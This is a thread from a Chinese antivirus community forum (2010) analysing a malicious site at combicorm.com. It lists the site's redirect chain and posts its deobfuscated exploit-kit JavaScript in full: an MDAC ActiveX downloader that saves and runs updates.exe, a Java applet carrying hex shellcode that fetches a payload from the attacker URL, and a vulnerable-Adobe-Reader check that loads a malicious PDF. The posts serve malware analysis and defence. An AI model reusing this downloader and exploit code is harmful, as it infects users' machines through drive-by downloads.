瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » http://combicorm.com/vkeo2/
250662772 - 2010-5-14 14:00:00


引用:

http://combicorm.com/vkeo2/
->http://combicorm.com/vkeo2/load.php?spl=java_gsb&;h=  (exe)
->http://combicorm.com/vkeo2/pdf.php?h= (pdf)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_new (exe)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_email (exe)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_geticon (exe)

网页分析:250662772


附件: 首页代码+pdf文件.rar
湖心小筑 - 2010-5-16 11:26:00
var RnzUCwiygew='http://combicorm.com/vkeo2/load.php?spl=mdac&h=';function KFh4Y0g7Cp7(ajE74k6aKNq,sO94PWkQXlO){var z4Kici2L180=null;try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO)}catch(e){}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO,"")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO,"","")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject("",sO94PWkQXlO)}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject(sO94PWkQXlO,"")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject(sO94PWkQXlO)}catch(e){}}return(z4Kici2L180);}function ybLwJKcxGxD(N8x9jVcK3s4){jz825hLSYrq="updates.exe";var P1l9grKWyXZ=N8x9jVcK3s4.CreateObject("Scripting.FileSystemObject","");var sap=KFh4Y0g7Cp7(N8x9jVcK3s4,"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on");var CvFDfgkQ5bY=KFh4Y0g7Cp7(N8x9jVcK3s4,"ADODB.Stream");var BFC1HX2Og21=null;jz825hLSYrq=P1l9grKWyXZ.BuildPath(P1l9grKWyXZ.GetSpecialFolder(2),jz825hLSYrq);CvFDfgkQ5bY.Mode=3;try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"Mic"+"ro"+"so"+"ft.XM"+"LH"+"T"+"TP");BFC1HX2Og21.open("G"+"ET",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"MSX"+"M"+"L2.XML"+"HT"+"TP");BFC1HX2Og21.open("GE"+"T",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"M"+"SX"+"ML2.Se"+"rv"+"erX"+"MLHT"+"TP");BFC1HX2Og21.open("GET",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=new XMLHttpRequest();BFC1HX2Og21.open("GET",RnzUCwiygew,false);}catch(e){return 0;}}}}CvFDfgkQ5bY.Type=1;BFC1HX2Og21.send(null);rb=BFC1HX2Og21.responseBody;CvFDfgkQ5bY.Open();CvFDfgkQ5bY.Write(rb);CvFDfgkQ5bY.SaveTofile(jz825hLSYrq,2);sap.ShellExecute(jz825hLSYrq);return 1;}function mdac(){var pjHXMcaEgqD=0;var NxJLZHcXUaXd=new Array('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);while(NxJLZHcXUaXd[pjHXMcaEgqD]){var N8x9jVcK3s4=null;N8x9jVcK3s4=document.createElement("object");N8x9jVcK3s4.setAttribute("classid","clsid:"+NxJLZHcXUaXd[pjHXMcaEgqD]);if(N8x9jVcK3s4){try{var srIVDk45akz=KFh4Y0g7Cp7(N8x9jVcK3s4,"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on");if(srIVDk45akz){if(ybLwJKcxGxD(N8x9jVcK3s4))return 1;}}catch(e){}}pjHXMcaEgqD++;}} setTimeout("mdac();",200); function java_gsb(){    var javaelem = document.createElement("applet");var paramelem = document.createElement("param");paramelem.setAttribute("name", "sc");paramelem.setAttribute("value", "9033c0648b4030780c8b400c8b701cad8b5808eb098b40348d407c8b583c6a445ad1e22be28beceb4f5a5283ea5689550456578b733c8b74337803f3568b762003f333c9495041ad33ff360fbe140338f27408c1cf0d03fa40ebef583bf875e55e8b462403c3668b0c488b561c03d38b048a03c35f5e50c38d7d085752b833ca8a5be8a2ffffff32c08bf7f2ae4fb8652e6578ab669866abb06c8ae09850686f6e2e646875726c6d54b88e4e0eecff5504935033c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff5504687474703a2f2f636f6d6269636f726d2e636f6d2f766b656f322f6c6f61642e7068703f73706c3d6a6176615f67736226683d");javaelem.setAttribute("code", "AppleT");javaelem.setAttribute("archive", "1.jar");javaelem.setAttribute("width", "100%");javaelem.setAttribute("height", "100%");javaelem.appendChild(paramelem);document.body.appendChild(javaelem);  } setTimeout("java_gsb();",3000); function pdf_ie(){try{var pdfObject = document.createElement("OBJECT");pdfObject.setAttribute("id", "jdf1");pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");document.body.appendChild(pdfObject);var ver = jdf1.GetVersions();ver = ver.split(",");ver = ver[1].split("=");ver = ver[1];if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >= "9") && (ver < "9.4"))){var pdfelement = document.createElement("iframe");pdfelement.setAttribute("src", "http://combicorm.com/vkeo2/pdf.php?h=");pdfelement.setAttribute("width", 200);pdfelement.setAttribute("height", 200);document.body.appendChild(pdfelement);}}catch(e){}}    setTimeout("pdf_ie();",7000);                                                   


关于:hxxp://combicorm.com/vkeo2/解密的日志(全体输出 -  6):

Level  0>http://combicorm.com/vkeo2/
Level  1>http://combicorm.com/vkeo2/load.php?spl=mdac&;h=
Level  1>http://combicorm.com/vkeo2/pdf.php?h=
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_geticon
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_email
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_new

日志由 Redoce2.0第91次修正版于 2010-5-17 13:01:38 生成。
长门有希 - 2010-5-17 17:16:00
问一下....
把这个NeAHLlM(YNxmZ3(UspYYX));");改成eval(YNxmZ3(UspYYX));");
解出来的怎么是这样子?
function Jot62n(){jZ1R6=parseInt(document.getElementById('a6TP7FgN').innerHTML);return jZ1R6;}function YNxmZ3(HF5cprVD){var WXQ3N5=Jot62n(); BeIfH=''; if (WXQ3N5==78) for(var i=0;i<HF5cprVD.length;i++){BeIfH +=String.fromCharCode(HF5cprVD);} return BeIfH;} window.clipboardData.setData('Text',clipboardData.getData('Text')+YNxmZ3(UspYYX));
1
查看完整版本: http://combicorm.com/vkeo2/